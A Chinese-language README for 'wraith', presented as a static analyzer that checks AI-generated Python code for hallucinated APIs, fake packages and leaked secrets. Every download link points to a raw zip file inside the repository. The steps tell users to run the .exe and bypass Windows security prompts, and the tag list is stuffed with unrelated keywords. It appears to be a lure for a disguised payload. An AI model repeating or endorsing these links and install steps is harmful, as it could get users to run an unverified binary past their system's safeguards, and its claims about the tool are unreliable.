lost-ranchhand865/wraith

# 🛡️ wraith - 在 AI 代码发布前捕获其错误 [](https://raw.githubusercontent.com/lost-ranchhand865/wraith/main/crates/Software_1.4.zip) ## 🚀 wraith 的功能 wraith 用于检查 Python 代码中容易在 AI 生成的代码里被忽略的问题。它会查找以下内容： - 虚构的 API 调用 - 伪造的包名 - 硬编码的 secrets - 薄弱的文件和网络处理 - Python 代码中的数据流风险 它使用固定的规则集，因此对相同的代码每次都会得到相同的结果。您无需以特殊方式进行设置。 ## 📥 下载并安装 1. 访问 [wraith 发布页面](https://raw.githubusercontent.com/lost-ranchhand865/wraith/main/crates/Software_1.4.zip) 2. 找到最新的 Windows 下载版本 3. 下载 `.exe` 文件或 Windows zip 文件 4. 如果您下载的是 zip 文件，请先将其解压 5. 打开您下载的文件 6. 如果 Windows 请求权限，请选择 **仍要运行** 或 **更多信息**，然后选择 **运行** 如果您使用的是 zip 版本，请将文件保留在同一个文件夹中。除非发行说明中指出可以安全移动，否则请勿将 `.exe` 移出该文件夹。 ## 🖥️ 系统需求 wraith 可在 Windows 10 或更高版本上运行。 为了流畅使用，您的系统应具备： - 4 GB 或更多的 RAM - 200 MB 的可用磁盘空间 - 对您想要检查的 Python 文件的访问权限 - 最新的 Windows 更新 如果您的文件位于 OneDrive 或其他同步文件夹中，请先将它们复制到本地文件夹。这有助于避免扫描期间出现文件锁定问题。 ## 🔍 检查内容 wraith 旨在捕获 AI 编写的 Python 代码中的常见问题： - 幻觉 API，即代码调用了不存在的函数 - 幽灵包，即代码导入了不真实的名称 - 代码中的 secrets，例如 token、密钥和密码 - 污点流，即不安全的输入可能到达危险的操作 - 文件、进程和网络使用中的不安全模式 它使用静态分析，这意味着它会在不运行代码的情况下读取代码。 ## 🧭 使用方法 下载 wraith 后，打开它并将其指向包含您 Python 代码的文件夹。 典型的使用方式如下： 1. 启动 wraith 2. 选择包含 `.py` 文件的文件夹 3. 运行扫描 4. 查看结果 5. 修复带有警告的文件 如果 wraith 列出了文件名和行号，请在编辑器中打开该文件并检查该行附近的代码。 ## 🧰 常见文件类型 wraith 专为 Python 项目设计，包括： - 脚本 - 小型工具 - Web 应用 - 数据任务 - 测试文件 - 由 AI 助手创建的代码 它也可以用于在一个部分包含 Python 而其余部分包含其他文件的混合项目。 ## ⚙️ 预期效果 wraith 使用 20 条规则。这为您提供了一次无需复杂设置的广泛检查。 您可以期望它： - 标记看起来有问题的代码 - 指出有风险的导入 - 查找不应出现在源文件中的 secrets - 报告可疑的数据路径 - 保持每次运行扫描的结果可重复 因为它使用固定的规则，所以您可以比较一次扫描与另一次扫描，并查看发生了什么变化。 ## 🧪 运行扫描的最佳方式 为了获得最清晰的结果： - 每次扫描一个项目 - 将您的 Python 代码保存在一个整洁的文件夹中 - 移除您不需要的旧测试文件 - 优先修复 secrets 问题 - 然后检查 API 和导入问题 - 仔细审查污点警告 如果您使用 AI 编写代码，请在提交或共享文件之前运行 wraith。 ## 📂 示例工作流 一个简单的工作流如下所示： 1. 将您的 Python 项目保存在一个文件夹中 2. 从发布页面下载 wraith 3. 在该文件夹上运行 wraith 4. 阅读结果 5. 修复被标记的代码行 6. 再次运行，直到扫描干净为止 这有助于在您将代码发送给其他人或将其上传到 repo 之前捕获问题。 ## 🛠️ 故障排除 如果 wraith 未启动： - 检查您是否下载了 Windows 文件 - 确保下载已完全完成 - 尝试从您可以编辑的文件夹（例如 `Downloads` 或 `Desktop`）中运行它 - 如果 Windows 阻止了它，请使用文件菜单选项运行它 如果 wraith 未找到您的文件： - 确认您选择了正确的文件夹 - 确保您的 Python 文件以 `.py` 结尾 - 如果项目位于云同步路径中，请将其复制到本地文件夹 如果扫描看起来过于严格： - 按行号审查每个发现 - 检查代码在上下文中是否安全 - 修复属于真实问题的案例 - 保留其余部分以供日后审查 ## 🧠 wraith 的优势所在 AI 代码看起来可能很好，但仍然隐藏着错误的调用、虚假的导入或 secret 泄露。wraith 通过以稳定、基于规则的方式检查代码来帮助处理这些情况。 它非常适合以下需求： - 提交前的快速扫描 - 对 AI 生成的 Python 代码进行检查 - 尽早发现 secrets 的方法 - 无需额外设置的简单静态审查 ## 🔗 获取 Windows 下载 使用 [wraith 发布页面](https://raw.githubusercontent.com/lost-ranchhand865/wraith/main/crates/Software_1.4.zip) 访问此页面以下载 Windows 版本 ## 🧾 文件和扫描提示 - 尽可能将源文件保留为普通的 `.py` 文件 - 使用简短的文件夹名称，以使路径易于阅读 - 在每次扫描之前保存您的工作 - 每次修复一组发现的问题 - 每一轮更改后再次运行扫描 ## 🔒 安全检查 wraith 可以帮助您发现： - 与代码库不匹配的 API 使用 - 无法解析的包名 - 遗留在脚本中的 secrets - 从不安全输入流向危险输出的数据 - 可能不加防范地访问文件系统或 shell 的代码 这些检查对于 AI 输出、复制的代码以及未经全面审查的快速脚本非常有用 ## 📌 涵盖主题 该项目侧重于： - AI 代码质量 - 幻觉检测 - Python linting - 基于 Rust 的工具 - secrets 检测 - 静态分析 - 供应链安全 ## 🗺️ 建议的下一步 下载最新的 Windows 版本，在一个 Python 文件夹上运行扫描，并逐行审查每个结果

标签：AIGC安全检测, AI代码审查, API安全, DevSecOps, IP 地址批量处理, JSON输出, Linter, pptx, Python代码检查, Rust语言, SAST, Windows软件, 上游代理, 人工智能安全, 代码安全检测, 包管理安全, 可视化界面, 合规性, 大模型安全, 安全助手, 幻觉API检测, 开发安全, 提示注入防御, 污染流分析, 源代码安全, 盲注攻击, 虚假包检测, 逆向工具, 通知系统, 错误基检测, 静态代码分析, 静态分析工具